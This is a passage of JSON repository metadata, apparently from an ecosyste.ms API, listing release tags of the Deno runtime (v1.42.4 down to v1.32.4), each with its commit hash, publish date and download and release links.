denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/